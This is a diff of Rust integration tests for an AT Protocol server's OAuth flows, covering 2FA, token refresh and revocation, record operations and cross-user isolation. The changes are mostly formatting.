860
944
location.contains(&format!("state={}", encoded_state)),
···
931
1015
"Should redirect to 2FA page, got status: {}",
932
1016
auth_res.status()
933
1017
);
934
-
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
1018
+
let location = auth_res
1019
+
.headers()
1020
+
.get("location")
1021
+
.unwrap()
1022
+
.to_str()
1023
+
.unwrap();
935
1024
assert!(
936
1025
location.contains("/oauth/authorize/2fa"),
937
1026
"Should redirect to 2FA page, got: {}",
···
1007
1096
.await
1008
1097
.unwrap();
1009
1098
assert!(auth_res.status().is_redirection());
1010
-
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
1099
+
let location = auth_res
1100
+
.headers()
1101
+
.get("location")
1102
+
.unwrap()
1103
+
.to_str()
1104
+
.unwrap();
1011
1105
assert!(location.contains("/oauth/authorize/2fa"));
1012
1106
let twofa_res = http_client
1013
1107
.post(format!("{}/oauth/authorize/2fa", url))
1014
-
.form(&[
1015
-
("request_uri", request_uri),
1016
-
("code", "000000"),
1017
-
])
1108
+
.form(&[("request_uri", request_uri), ("code", "000000")])
1018
1109
.send()
1019
1110
.await
1020
1111
.unwrap();
···
1090
1181
.await
1091
1182
.unwrap();
1092
1183
assert!(auth_res.status().is_redirection());
1093
-
let twofa_code: String = sqlx::query_scalar(
1094
-
"SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1"
1095
-
)
1096
-
.bind(request_uri)
1097
-
.fetch_one(&pool)
1098
-
.await
1099
-
.expect("Failed to get 2FA code from database");
1184
+
let twofa_code: String =
1185
+
sqlx::query_scalar("SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1")
1186
+
.bind(request_uri)
1187
+
.fetch_one(&pool)
1188
+
.await
1189
+
.expect("Failed to get 2FA code from database");
1100
1190
let twofa_res = auth_client
1101
1191
.post(format!("{}/oauth/authorize/2fa", url))
1102
-
.form(&[
1103
-
("request_uri", request_uri),
1104
-
("code", &twofa_code),
1105
-
])
1192
+
.form(&[("request_uri", request_uri), ("code", &twofa_code)])
1106
1193
.send()
1107
1194
.await
1108
1195
.unwrap();
···
1111
1198
"Valid 2FA code should redirect to success, got status: {}",
1112
1199
twofa_res.status()
1113
1200
);
1114
-
let location = twofa_res.headers().get("location").unwrap().to_str().unwrap();
1201
+
let location = twofa_res
1202
+
.headers()
1203
+
.get("location")
1204
+
.unwrap()
1205
+
.to_str()
1206
+
.unwrap();
1115
1207
assert!(
1116
1208
location.starts_with(redirect_uri),
1117
1209
"Should redirect to client callback, got: {}",
···
1121
1213
location.contains("code="),
1122
1214
"Redirect should include authorization code"
1123
1215
);
1124
-
let auth_code = location.split("code=").nth(1).unwrap().split('&').next().unwrap();
1216
+
let auth_code = location
1217
+
.split("code=")
1218
+
.nth(1)
1219
+
.unwrap()
1220
+
.split('&')
1221
+
.next()
1222
+
.unwrap();
1125
1223
let token_res = http_client
1126
1224
.post(format!("{}/oauth/token", url))
1127
1225
.form(&[
···
1134
1232
.send()
1135
1233
.await
1136
1234
.unwrap();
1137
-
assert_eq!(token_res.status(), StatusCode::OK, "Token exchange should succeed");
1235
+
assert_eq!(
1236
+
token_res.status(),
1237
+
StatusCode::OK,
1238
+
"Token exchange should succeed"
1239
+
);
1138
1240
let token_body: Value = token_res.json().await.unwrap();
1139
1241
assert!(token_body["access_token"].is_string());
1140
1242
assert_eq!(token_body["sub"], user_did);
···
1207
1309
for i in 0..5 {
1208
1310
let res = http_client
1209
1311
.post(format!("{}/oauth/authorize/2fa", url))
1210
-
.form(&[
1211
-
("request_uri", request_uri),
1212
-
("code", "999999"),
1213
-
])
1312
+
.form(&[("request_uri", request_uri), ("code", "999999")])
1214
1313
.send()
1215
1314
.await
1216
1315
.unwrap();
1217
1316
if i < 4 {
1218
-
assert_eq!(res.status(), StatusCode::OK, "Attempt {} should show error page", i + 1);
1317
+
assert_eq!(
1318
+
res.status(),
1319
+
StatusCode::OK,
1320
+
"Attempt {} should show error page",
1321
+
i + 1
1322
+
);
1219
1323
let body = res.text().await.unwrap();
1220
1324
assert!(
1221
1325
body.contains("Invalid verification code"),
1222
-
"Should show invalid code error on attempt {}", i + 1
1326
+
"Should show invalid code error on attempt {}",
1327
+
i + 1
1223
1328
);
1224
1329
}
1225
1330
}
1226
1331
let lockout_res = http_client
1227
1332
.post(format!("{}/oauth/authorize/2fa", url))
1228
-
.form(&[
1229
-
("request_uri", request_uri),
1230
-
("code", "999999"),
1231
-
])
1333
+
.form(&[("request_uri", request_uri), ("code", "999999")])
1232
1334
.send()
1233
1335
.await
1234
1336
.unwrap();
···
1294
1396
.await
1295
1397
.unwrap();
1296
1398
assert!(auth_res.status().is_redirection());
1297
-
let device_cookie = auth_res.headers()
1399
+
let device_cookie = auth_res
1400
+
.headers()
1298
1401
.get("set-cookie")
1299
1402
.and_then(|v| v.to_str().ok())
1300
1403
.map(|s| s.split(';').next().unwrap_or("").to_string())
1301
1404
.expect("Should have received device cookie");
1302
-
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
1405
+
let location = auth_res
1406
+
.headers()
1407
+
.get("location")
1408
+
.unwrap()
1409
+
.to_str()
1410
+
.unwrap();
1303
1411
assert!(location.contains("code="), "First auth should succeed");
1304
-
let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap();
1412
+
let code = location
1413
+
.split("code=")
1414
+
.nth(1)
1415
+
.unwrap()
1416
+
.split('&')
1417
+
.next()
1418
+
.unwrap();
1305
1419
let _token_body: Value = http_client
1306
1420
.post(format!("{}/oauth/token", url))
1307
1421
.form(&[
···
1348
1462
let select_res = auth_client
1349
1463
.post(format!("{}/oauth/authorize/select", url))
1350
1464
.header("cookie", &device_cookie)
1351
-
.form(&[
1352
-
("request_uri", request_uri2),
1353
-
("did", &user_did),
1354
-
])
1465
+
.form(&[("request_uri", request_uri2), ("did", &user_did)])
1355
1466
.send()
1356
1467
.await
1357
1468
.unwrap();
···
1360
1471
"Account selector should redirect, got status: {}",
1361
1472
select_res.status()
1362
1473
);
1363
-
let select_location = select_res.headers().get("location").unwrap().to_str().unwrap();
1474
+
let select_location = select_res
1475
+
.headers()
1476
+
.get("location")
1477
+
.unwrap()
1478
+
.to_str()
1479
+
.unwrap();
1364
1480
assert!(
1365
1481
select_location.contains("/oauth/authorize/2fa"),
1366
1482
"Account selector with 2FA enabled should redirect to 2FA page, got: {}",
1367
1483
select_location
1368
1484
);
1369
-
let twofa_code: String = sqlx::query_scalar(
1370
-
"SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1"
1371
-
)
1372
-
.bind(request_uri2)
1373
-
.fetch_one(&pool)
1374
-
.await
1375
-
.expect("Failed to get 2FA code");
1485
+
let twofa_code: String =
1486
+
sqlx::query_scalar("SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1")
1487
+
.bind(request_uri2)
1488
+
.fetch_one(&pool)
1489
+
.await
1490
+
.expect("Failed to get 2FA code");
1376
1491
let twofa_res = auth_client
1377
1492
.post(format!("{}/oauth/authorize/2fa", url))
1378
1493
.header("cookie", &device_cookie)
1379
-
.form(&[
1380
-
("request_uri", request_uri2),
1381
-
("code", &twofa_code),
1382
-
])
1494
+
.form(&[("request_uri", request_uri2), ("code", &twofa_code)])
1383
1495
.send()
1384
1496
.await
1385
1497
.unwrap();
1386
1498
assert!(twofa_res.status().is_redirection());
1387
-
let final_location = twofa_res.headers().get("location").unwrap().to_str().unwrap();
1499
+
let final_location = twofa_res
1500
+
.headers()
1501
+
.get("location")
1502
+
.unwrap()
1503
+
.to_str()
1504
+
.unwrap();
1388
1505
assert!(
1389
1506
final_location.starts_with(redirect_uri) && final_location.contains("code="),
1390
1507
"After 2FA, should redirect to client with code, got: {}",
1391
1508
final_location
1392
1509
);
1393
-
let final_code = final_location.split("code=").nth(1).unwrap().split('&').next().unwrap();
1510
+
let final_code = final_location
1511
+
.split("code=")
1512
+
.nth(1)
1513
+
.unwrap()
1514
+
.split('&')
1515
+
.next()
1516
+
.unwrap();
1394
1517
let token_res = http_client
1395
1518
.post(format!("{}/oauth/token", url))
1396
1519
.form(&[
···
1405
1528
.unwrap();
1406
1529
assert_eq!(token_res.status(), StatusCode::OK);
1407
1530
let final_token: Value = token_res.json().await.unwrap();
1408
-
assert_eq!(final_token["sub"], user_did, "Token should be for the correct user");
1531
+
assert_eq!(
1532
+
final_token["sub"], user_did,
1533
+
"Token should be for the correct user"
1534
+
);
1409
1535
}
+201
-119
tests/oauth_lifecycle.rs
+201
-119
tests/oauth_lifecycle.rs
···
5
5
use chrono::Utc;
6
6
use common::{base_url, client};
7
7
use helpers::verify_new_account;
8
-
use reqwest::{redirect, StatusCode};
9
-
use serde_json::{json, Value};
8
+
use reqwest::{StatusCode, redirect};
9
+
use serde_json::{Value, json};
10
10
use sha2::{Digest, Sha256};
11
+
use wiremock::matchers::{method, path};
11
12
use wiremock::{Mock, MockServer, ResponseTemplate};
12
-
use wiremock::matchers::{method, path};
13
13
14
14
fn generate_pkce() -> (String, String) {
15
15
let verifier_bytes: [u8; 32] = rand::random();
···
55
55
client_id: String,
56
56
}
57
57
58
-
async fn create_user_and_oauth_session(handle_prefix: &str, redirect_uri: &str) -> (OAuthSession, MockServer) {
58
+
async fn create_user_and_oauth_session(
59
+
handle_prefix: &str,
60
+
redirect_uri: &str,
61
+
) -> (OAuthSession, MockServer) {
59
62
let url = base_url().await;
60
63
let http_client = client();
61
64
let ts = Utc::now().timestamp_millis();
···
92
95
.send()
93
96
.await
94
97
.expect("PAR failed");
95
-
assert_eq!(par_res.status(), StatusCode::OK);
98
+
assert!(
99
+
par_res.status() == StatusCode::OK || par_res.status() == StatusCode::CREATED,
100
+
"PAR should succeed with 200 or 201, got {}",
101
+
par_res.status()
102
+
);
96
103
let par_body: Value = par_res.json().await.unwrap();
97
104
let request_uri = par_body["request_uri"].as_str().unwrap();
98
105
let auth_client = no_redirect_client();
···
107
114
.send()
108
115
.await
109
116
.expect("Authorize failed");
110
-
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
111
-
let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap();
117
+
let location = auth_res
118
+
.headers()
119
+
.get("location")
120
+
.unwrap()
121
+
.to_str()
122
+
.unwrap();
123
+
let code = location
124
+
.split("code=")
125
+
.nth(1)
126
+
.unwrap()
127
+
.split('&')
128
+
.next()
129
+
.unwrap();
112
130
let token_res = http_client
113
131
.post(format!("{}/oauth/token", url))
114
132
.form(&[
···
136
154
async fn test_oauth_token_can_create_and_read_records() {
137
155
let url = base_url().await;
138
156
let http_client = client();
139
-
let (session, _mock) = create_user_and_oauth_session(
140
-
"oauth-records",
141
-
"https://example.com/callback"
142
-
).await;
157
+
let (session, _mock) =
158
+
create_user_and_oauth_session("oauth-records", "https://example.com/callback").await;
143
159
let collection = "app.bsky.feed.post";
144
160
let post_text = "Hello from OAuth! This post was created with an OAuth access token.";
145
161
let create_res = http_client
···
157
173
.send()
158
174
.await
159
175
.expect("createRecord failed");
160
-
assert_eq!(create_res.status(), StatusCode::OK, "Should create record with OAuth token");
176
+
assert_eq!(
177
+
create_res.status(),
178
+
StatusCode::OK,
179
+
"Should create record with OAuth token"
180
+
);
161
181
let create_body: Value = create_res.json().await.unwrap();
162
182
let uri = create_body["uri"].as_str().unwrap();
163
183
let rkey = uri.split('/').last().unwrap();
···
172
192
.send()
173
193
.await
174
194
.expect("getRecord failed");
175
-
assert_eq!(get_res.status(), StatusCode::OK, "Should read record with OAuth token");
195
+
assert_eq!(
196
+
get_res.status(),
197
+
StatusCode::OK,
198
+
"Should read record with OAuth token"
199
+
);
176
200
let get_body: Value = get_res.json().await.unwrap();
177
201
assert_eq!(get_body["value"]["text"], post_text);
178
202
}
···
181
205
async fn test_oauth_token_can_upload_blob() {
182
206
let url = base_url().await;
183
207
let http_client = client();
184
-
let (session, _mock) = create_user_and_oauth_session(
185
-
"oauth-blob",
186
-
"https://example.com/callback"
187
-
).await;
208
+
let (session, _mock) =
209
+
create_user_and_oauth_session("oauth-blob", "https://example.com/callback").await;
188
210
let blob_data = b"This is test blob data uploaded via OAuth";
189
211
let upload_res = http_client
190
212
.post(format!("{}/xrpc/com.atproto.repo.uploadBlob", url))
···
194
216
.send()
195
217
.await
196
218
.expect("uploadBlob failed");
197
-
assert_eq!(upload_res.status(), StatusCode::OK, "Should upload blob with OAuth token");
219
+
assert_eq!(
220
+
upload_res.status(),
221
+
StatusCode::OK,
222
+
"Should upload blob with OAuth token"
223
+
);
198
224
let upload_body: Value = upload_res.json().await.unwrap();
199
225
assert!(upload_body["blob"]["ref"]["$link"].is_string());
200
226
assert_eq!(upload_body["blob"]["mimeType"], "text/plain");
···
204
230
async fn test_oauth_token_can_describe_repo() {
205
231
let url = base_url().await;
206
232
let http_client = client();
207
-
let (session, _mock) = create_user_and_oauth_session(
208
-
"oauth-describe",
209
-
"https://example.com/callback"
210
-
).await;
233
+
let (session, _mock) =
234
+
create_user_and_oauth_session("oauth-describe", "https://example.com/callback").await;
211
235
let describe_res = http_client
212
236
.get(format!("{}/xrpc/com.atproto.repo.describeRepo", url))
213
237
.bearer_auth(&session.access_token)
···
215
239
.send()
216
240
.await
217
241
.expect("describeRepo failed");
218
-
assert_eq!(describe_res.status(), StatusCode::OK, "Should describe repo with OAuth token");
242
+
assert_eq!(
243
+
describe_res.status(),
244
+
StatusCode::OK,
245
+
"Should describe repo with OAuth token"
246
+
);
219
247
let describe_body: Value = describe_res.json().await.unwrap();
220
248
assert_eq!(describe_body["did"], session.did);
221
249
assert!(describe_body["handle"].is_string());
···
225
253
async fn test_oauth_full_post_lifecycle_create_edit_delete() {
226
254
let url = base_url().await;
227
255
let http_client = client();
228
-
let (session, _mock) = create_user_and_oauth_session(
229
-
"oauth-lifecycle",
230
-
"https://example.com/callback"
231
-
).await;
256
+
let (session, _mock) =
257
+
create_user_and_oauth_session("oauth-lifecycle", "https://example.com/callback").await;
232
258
let collection = "app.bsky.feed.post";
233
259
let original_text = "Original post content";
234
260
let create_res = http_client
···
267
293
.send()
268
294
.await
269
295
.unwrap();
270
-
assert_eq!(put_res.status(), StatusCode::OK, "Should update record with OAuth token");
296
+
assert_eq!(
297
+
put_res.status(),
298
+
StatusCode::OK,
299
+
"Should update record with OAuth token"
300
+
);
271
301
let get_res = http_client
272
302
.get(format!("{}/xrpc/com.atproto.repo.getRecord", url))
273
303
.bearer_auth(&session.access_token)
···
280
310
.await
281
311
.unwrap();
282
312
let get_body: Value = get_res.json().await.unwrap();
283
-
assert_eq!(get_body["value"]["text"], updated_text, "Record should have updated text");
313
+
assert_eq!(
314
+
get_body["value"]["text"], updated_text,
315
+
"Record should have updated text"
316
+
);
284
317
let delete_res = http_client
285
318
.post(format!("{}/xrpc/com.atproto.repo.deleteRecord", url))
286
319
.bearer_auth(&session.access_token)
···
292
325
.send()
293
326
.await
294
327
.unwrap();
295
-
assert_eq!(delete_res.status(), StatusCode::OK, "Should delete record with OAuth token");
328
+
assert_eq!(
329
+
delete_res.status(),
330
+
StatusCode::OK,
331
+
"Should delete record with OAuth token"
332
+
);
296
333
let get_deleted_res = http_client
297
334
.get(format!("{}/xrpc/com.atproto.repo.getRecord", url))
298
335
.bearer_auth(&session.access_token)
···
305
342
.await
306
343
.unwrap();
307
344
assert!(
308
-
get_deleted_res.status() == StatusCode::BAD_REQUEST || get_deleted_res.status() == StatusCode::NOT_FOUND,
345
+
get_deleted_res.status() == StatusCode::BAD_REQUEST
346
+
|| get_deleted_res.status() == StatusCode::NOT_FOUND,
309
347
"Deleted record should not be found, got {}",
310
348
get_deleted_res.status()
311
349
);
···
315
353
async fn test_oauth_batch_operations_apply_writes() {
316
354
let url = base_url().await;
317
355
let http_client = client();
318
-
let (session, _mock) = create_user_and_oauth_session(
319
-
"oauth-batch",
320
-
"https://example.com/callback"
321
-
).await;
356
+
let (session, _mock) =
357
+
create_user_and_oauth_session("oauth-batch", "https://example.com/callback").await;
322
358
let collection = "app.bsky.feed.post";
323
359
let now = Utc::now().to_rfc3339();
324
360
let apply_res = http_client
···
362
398
.send()
363
399
.await
364
400
.unwrap();
365
-
assert_eq!(apply_res.status(), StatusCode::OK, "Should apply batch writes with OAuth token");
401
+
assert_eq!(
402
+
apply_res.status(),
403
+
StatusCode::OK,
404
+
"Should apply batch writes with OAuth token"
405
+
);
366
406
let list_res = http_client
367
407
.get(format!("{}/xrpc/com.atproto.repo.listRecords", url))
368
408
.bearer_auth(&session.access_token)
369
-
.query(&[
370
-
("repo", session.did.as_str()),
371
-
("collection", collection),
372
-
])
409
+
.query(&[("repo", session.did.as_str()), ("collection", collection)])
373
410
.send()
374
411
.await
375
412
.unwrap();
376
413
assert_eq!(list_res.status(), StatusCode::OK);
377
414
let list_body: Value = list_res.json().await.unwrap();
378
415
let records = list_body["records"].as_array().unwrap();
379
-
assert!(records.len() >= 3, "Should have at least 3 records from batch");
416
+
assert!(
417
+
records.len() >= 3,
418
+
"Should have at least 3 records from batch"
419
+
);
380
420
}
381
421
382
422
#[tokio::test]
383
423
async fn test_oauth_token_refresh_maintains_access() {
384
424
let url = base_url().await;
385
425
let http_client = client();
386
-
let (session, _mock) = create_user_and_oauth_session(
387
-
"oauth-refresh-access",
388
-
"https://example.com/callback"
389
-
).await;
426
+
let (session, _mock) =
427
+
create_user_and_oauth_session("oauth-refresh-access", "https://example.com/callback").await;
390
428
let collection = "app.bsky.feed.post";
391
429
let create_res = http_client
392
430
.post(format!("{}/xrpc/com.atproto.repo.createRecord", url))
···
403
441
.send()
404
442
.await
405
443
.unwrap();
406
-
assert_eq!(create_res.status(), StatusCode::OK, "Original token should work");
444
+
assert_eq!(
445
+
create_res.status(),
446
+
StatusCode::OK,
447
+
"Original token should work"
448
+
);
407
449
let refresh_res = http_client
408
450
.post(format!("{}/oauth/token", url))
409
451
.form(&[
···
417
459
assert_eq!(refresh_res.status(), StatusCode::OK);
418
460
let refresh_body: Value = refresh_res.json().await.unwrap();
419
461
let new_access_token = refresh_body["access_token"].as_str().unwrap();
420
-
assert_ne!(new_access_token, session.access_token, "New token should be different");
462
+
assert_ne!(
463
+
new_access_token, session.access_token,
464
+
"New token should be different"
465
+
);
421
466
let create_res2 = http_client
422
467
.post(format!("{}/xrpc/com.atproto.repo.createRecord", url))
423
468
.bearer_auth(new_access_token)
···
433
478
.send()
434
479
.await
435
480
.unwrap();
436
-
assert_eq!(create_res2.status(), StatusCode::OK, "New token should work for creating records");
481
+
assert_eq!(
482
+
create_res2.status(),
483
+
StatusCode::OK,
484
+
"New token should work for creating records"
485
+
);
437
486
let list_res = http_client
438
487
.get(format!("{}/xrpc/com.atproto.repo.listRecords", url))
439
488
.bearer_auth(new_access_token)
440
-
.query(&[
441
-
("repo", session.did.as_str()),
442
-
("collection", collection),
443
-
])
489
+
.query(&[("repo", session.did.as_str()), ("collection", collection)])
444
490
.send()
445
491
.await
446
492
.unwrap();
447
-
assert_eq!(list_res.status(), StatusCode::OK, "New token should work for listing records");
493
+
assert_eq!(
494
+
list_res.status(),
495
+
StatusCode::OK,
496
+
"New token should work for listing records"
497
+
);
448
498
let list_body: Value = list_res.json().await.unwrap();
449
499
let records = list_body["records"].as_array().unwrap();
450
500
assert_eq!(records.len(), 2, "Should have both posts");
···
454
504
async fn test_oauth_revoked_token_cannot_access_resources() {
455
505
let url = base_url().await;
456
506
let http_client = client();
457
-
let (session, _mock) = create_user_and_oauth_session(
458
-
"oauth-revoke-access",
459
-
"https://example.com/callback"
460
-
).await;
507
+
let (session, _mock) =
508
+
create_user_and_oauth_session("oauth-revoke-access", "https://example.com/callback").await;
461
509
let collection = "app.bsky.feed.post";
462
510
let create_res = http_client
463
511
.post(format!("{}/xrpc/com.atproto.repo.createRecord", url))
···
474
522
.send()
475
523
.await
476
524
.unwrap();
477
-
assert_eq!(create_res.status(), StatusCode::OK, "Token should work before revocation");
525
+
assert_eq!(
526
+
create_res.status(),
527
+
StatusCode::OK,
528
+
"Token should work before revocation"
529
+
);
478
530
let revoke_res = http_client
479
531
.post(format!("{}/oauth/revoke", url))
480
532
.form(&[("token", session.refresh_token.as_str())])
481
533
.send()
482
534
.await
483
535
.unwrap();
484
-
assert_eq!(revoke_res.status(), StatusCode::OK, "Revocation should succeed");
536
+
assert_eq!(
537
+
revoke_res.status(),
538
+
StatusCode::OK,
539
+
"Revocation should succeed"
540
+
);
485
541
let refresh_res = http_client
486
542
.post(format!("{}/oauth/token", url))
487
543
.form(&[
···
492
548
.send()
493
549
.await
494
550
.unwrap();
495
-
assert_eq!(refresh_res.status(), StatusCode::BAD_REQUEST, "Revoked refresh token should not work");
551
+
assert_eq!(
552
+
refresh_res.status(),
553
+
StatusCode::BAD_REQUEST,
554
+
"Revoked refresh token should not work"
555
+
);
496
556
}
497
557
498
558
#[tokio::test]
···
548
608
.send()
549
609
.await
550
610
.unwrap();
551
-
let location1 = auth_res1.headers().get("location").unwrap().to_str().unwrap();
552
-
let code1 = location1.split("code=").nth(1).unwrap().split('&').next().unwrap();
611
+
let location1 = auth_res1
612
+
.headers()
613
+
.get("location")
614
+
.unwrap()
615
+
.to_str()
616
+
.unwrap();
617
+
let code1 = location1
618
+
.split("code=")
619
+
.nth(1)
620
+
.unwrap()
621
+
.split('&')
622
+
.next()
623
+
.unwrap();
553
624
let token_res1 = http_client
554
625
.post(format!("{}/oauth/token", url))
555
626
.form(&[
···
590
661
.send()
591
662
.await
592
663
.unwrap();
593
-
let location2 = auth_res2.headers().get("location").unwrap().to_str().unwrap();
594
-
let code2 = location2.split("code=").nth(1).unwrap().split('&').next().unwrap();
664
+
let location2 = auth_res2
665
+
.headers()
666
+
.get("location")
667
+
.unwrap()
668
+
.to_str()
669
+
.unwrap();
670
+
let code2 = location2
671
+
.split("code=")
672
+
.nth(1)
673
+
.unwrap()
674
+
.split('&')
675
+
.next()
676
+
.unwrap();
595
677
let token_res2 = http_client
596
678
.post(format!("{}/oauth/token", url))
597
679
.form(&[
···
606
688
.unwrap();
607
689
let token_body2: Value = token_res2.json().await.unwrap();
608
690
let token2 = token_body2["access_token"].as_str().unwrap();
609
-
assert_ne!(token1, token2, "Different clients should get different tokens");
691
+
assert_ne!(
692
+
token1, token2,
693
+
"Different clients should get different tokens"
694
+
);
610
695
let collection = "app.bsky.feed.post";
611
696
let create_res1 = http_client
612
697
.post(format!("{}/xrpc/com.atproto.repo.createRecord", url))
···
623
708
.send()
624
709
.await
625
710
.unwrap();
626
-
assert_eq!(create_res1.status(), StatusCode::OK, "Client 1 token should work");
711
+
assert_eq!(
712
+
create_res1.status(),
713
+
StatusCode::OK,
714
+
"Client 1 token should work"
715
+
);
627
716
let create_res2 = http_client
628
717
.post(format!("{}/xrpc/com.atproto.repo.createRecord", url))
629
718
.bearer_auth(token2)
···
639
728
.send()
640
729
.await
641
730
.unwrap();
642
-
assert_eq!(create_res2.status(), StatusCode::OK, "Client 2 token should work");
731
+
assert_eq!(
732
+
create_res2.status(),
733
+
StatusCode::OK,
734
+
"Client 2 token should work"
735
+
);
643
736
let list_res = http_client
644
737
.get(format!("{}/xrpc/com.atproto.repo.listRecords", url))
645
738
.bearer_auth(token1)
646
-
.query(&[
647
-
("repo", user_did),
648
-
("collection", collection),
649
-
])
739
+
.query(&[("repo", user_did), ("collection", collection)])
650
740
.send()
651
741
.await
652
742
.unwrap();
653
743
let list_body: Value = list_res.json().await.unwrap();
654
744
let records = list_body["records"].as_array().unwrap();
655
-
assert_eq!(records.len(), 2, "Both posts should be visible to either client");
745
+
assert_eq!(
746
+
records.len(),
747
+
2,
748
+
"Both posts should be visible to either client"
749
+
);
656
750
}
657
751
658
752
#[tokio::test]
659
753
async fn test_oauth_social_interactions_follow_like_repost() {
660
754
let url = base_url().await;
661
755
let http_client = client();
662
-
let (alice, _mock_alice) = create_user_and_oauth_session(
663
-
"alice-social",
664
-
"https://alice-app.example.com/callback"
665
-
).await;
666
-
let (bob, _mock_bob) = create_user_and_oauth_session(
667
-
"bob-social",
668
-
"https://bob-app.example.com/callback"
669
-
).await;
756
+
let (alice, _mock_alice) =
757
+
create_user_and_oauth_session("alice-social", "https://alice-app.example.com/callback")
758
+
.await;
759
+
let (bob, _mock_bob) =
760
+
create_user_and_oauth_session("bob-social", "https://bob-app.example.com/callback").await;
670
761
let post_collection = "app.bsky.feed.post";
671
762
let post_res = http_client
672
763
.post(format!("{}/xrpc/com.atproto.repo.createRecord", url))
···
703
794
.send()
704
795
.await
705
796
.unwrap();
706
-
assert_eq!(follow_res.status(), StatusCode::OK, "Bob should be able to follow Alice via OAuth");
797
+
assert_eq!(
798
+
follow_res.status(),
799
+
StatusCode::OK,
800
+
"Bob should be able to follow Alice via OAuth"
801
+
);
707
802
let like_collection = "app.bsky.feed.like";
708
803
let like_res = http_client
709
804
.post(format!("{}/xrpc/com.atproto.repo.createRecord", url))
···
723
818
.send()
724
819
.await
725
820
.unwrap();
726
-
assert_eq!(like_res.status(), StatusCode::OK, "Bob should be able to like Alice's post via OAuth");
821
+
assert_eq!(
822
+
like_res.status(),
823
+
StatusCode::OK,
824
+
"Bob should be able to like Alice's post via OAuth"
825
+
);
727
826
let repost_collection = "app.bsky.feed.repost";
728
827
let repost_res = http_client
729
828
.post(format!("{}/xrpc/com.atproto.repo.createRecord", url))
···
743
842
.send()
744
843
.await
745
844
.unwrap();
746
-
assert_eq!(repost_res.status(), StatusCode::OK, "Bob should be able to repost Alice's post via OAuth");
845
+
assert_eq!(
846
+
repost_res.status(),
847
+
StatusCode::OK,
848
+
"Bob should be able to repost Alice's post via OAuth"
849
+
);
747
850
let bob_follows = http_client
748
851
.get(format!("{}/xrpc/com.atproto.repo.listRecords", url))
749
852
.bearer_auth(&bob.access_token)
···
761
864
let bob_likes = http_client
762
865
.get(format!("{}/xrpc/com.atproto.repo.listRecords", url))
763
866
.bearer_auth(&bob.access_token)
764
-
.query(&[
765
-
("repo", bob.did.as_str()),
766
-
("collection", like_collection),
767
-
])
867
+
.query(&[("repo", bob.did.as_str()), ("collection", like_collection)])
768
868
.send()
769
869
.await
770
870
.unwrap();
···
777
877
async fn test_oauth_cannot_modify_other_users_repo() {
778
878
let url = base_url().await;
779
879
let http_client = client();
780
-
let (alice, _mock_alice) = create_user_and_oauth_session(
781
-
"alice-boundary",
782
-
"https://alice.example.com/callback"
783
-
).await;
784
-
let (bob, _mock_bob) = create_user_and_oauth_session(
785
-
"bob-boundary",
786
-
"https://bob.example.com/callback"
787
-
).await;
880
+
let (alice, _mock_alice) =
881
+
create_user_and_oauth_session("alice-boundary", "https://alice.example.com/callback").await;
882
+
let (bob, _mock_bob) =
883
+
create_user_and_oauth_session("bob-boundary", "https://bob.example.com/callback").await;
788
884
let collection = "app.bsky.feed.post";
789
885
let malicious_res = http_client
790
886
.post(format!("{}/xrpc/com.atproto.repo.createRecord", url))
···
809
905
let alice_posts = http_client
810
906
.get(format!("{}/xrpc/com.atproto.repo.listRecords", url))
811
907
.bearer_auth(&alice.access_token)
812
-
.query(&[
813
-
("repo", alice.did.as_str()),
814
-
("collection", collection),
815
-
])
908
+
.query(&[("repo", alice.did.as_str()), ("collection", collection)])
816
909
.send()
817
910
.await
818
911
.unwrap();
···
825
918
async fn test_oauth_session_isolation_between_users() {
826
919
let url = base_url().await;
827
920
let http_client = client();
828
-
let (alice, _mock_alice) = create_user_and_oauth_session(
829
-
"alice-isolation",
830
-
"https://alice.example.com/callback"
831
-
).await;
832
-
let (bob, _mock_bob) = create_user_and_oauth_session(
833
-
"bob-isolation",
834
-
"https://bob.example.com/callback"
835
-
).await;
921
+
let (alice, _mock_alice) =
922
+
create_user_and_oauth_session("alice-isolation", "https://alice.example.com/callback")
923
+
.await;
924
+
let (bob, _mock_bob) =
925
+
create_user_and_oauth_session("bob-isolation", "https://bob.example.com/callback").await;
836
926
let collection = "app.bsky.feed.post";
837
927
let alice_post = http_client
838
928
.post(format!("{}/xrpc/com.atproto.repo.createRecord", url))
···
869
959
let alice_list = http_client
870
960
.get(format!("{}/xrpc/com.atproto.repo.listRecords", url))
871
961
.bearer_auth(&alice.access_token)
872
-
.query(&[
873
-
("repo", alice.did.as_str()),
874
-
("collection", collection),
875
-
])
962
+
.query(&[("repo", alice.did.as_str()), ("collection", collection)])
876
963
.send()
877
964
.await
878
965
.unwrap();
···
883
970
let bob_list = http_client
884
971
.get(format!("{}/xrpc/com.atproto.repo.listRecords", url))
885
972
.bearer_auth(&bob.access_token)
886
-
.query(&[
887
-
("repo", bob.did.as_str()),
888
-
("collection", collection),
889
-
])
973
+
.query(&[("repo", bob.did.as_str()), ("collection", collection)])
890
974
.send()
891
975
.await
892
976
.unwrap();
···
900
984
async fn test_oauth_token_works_with_sync_endpoints() {
901
985
let url = base_url().await;
902
986
let http_client = client();
903
-
let (session, _mock) = create_user_and_oauth_session(
904
-
"oauth-sync",
905
-
"https://example.com/callback"
906
-
).await;
987
+
let (session, _mock) =
988
+
create_user_and_oauth_session("oauth-sync", "https://example.com/callback").await;
907
989
let collection = "app.bsky.feed.post";
908
990
http_client
909
991
.post(format!("{}/xrpc/com.atproto.repo.createRecord", url))
+256
-75
tests/oauth_security.rs
+256
-75
tests/oauth_security.rs
···
3
3
mod common;
4
4
mod helpers;
5
5
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
6
-
use bspds::oauth::dpop::{DPoPVerifier, DPoPJwk, compute_jwk_thumbprint};
6
+
use bspds::oauth::dpop::{DPoPJwk, DPoPVerifier, compute_jwk_thumbprint};
7
7
use chrono::Utc;
8
8
use common::{base_url, client};
9
9
use helpers::verify_new_account;
10
-
use reqwest::{redirect, StatusCode};
11
-
use serde_json::{json, Value};
10
+
use reqwest::{StatusCode, redirect};
11
+
use serde_json::{Value, json};
12
12
use sha2::{Digest, Sha256};
13
-
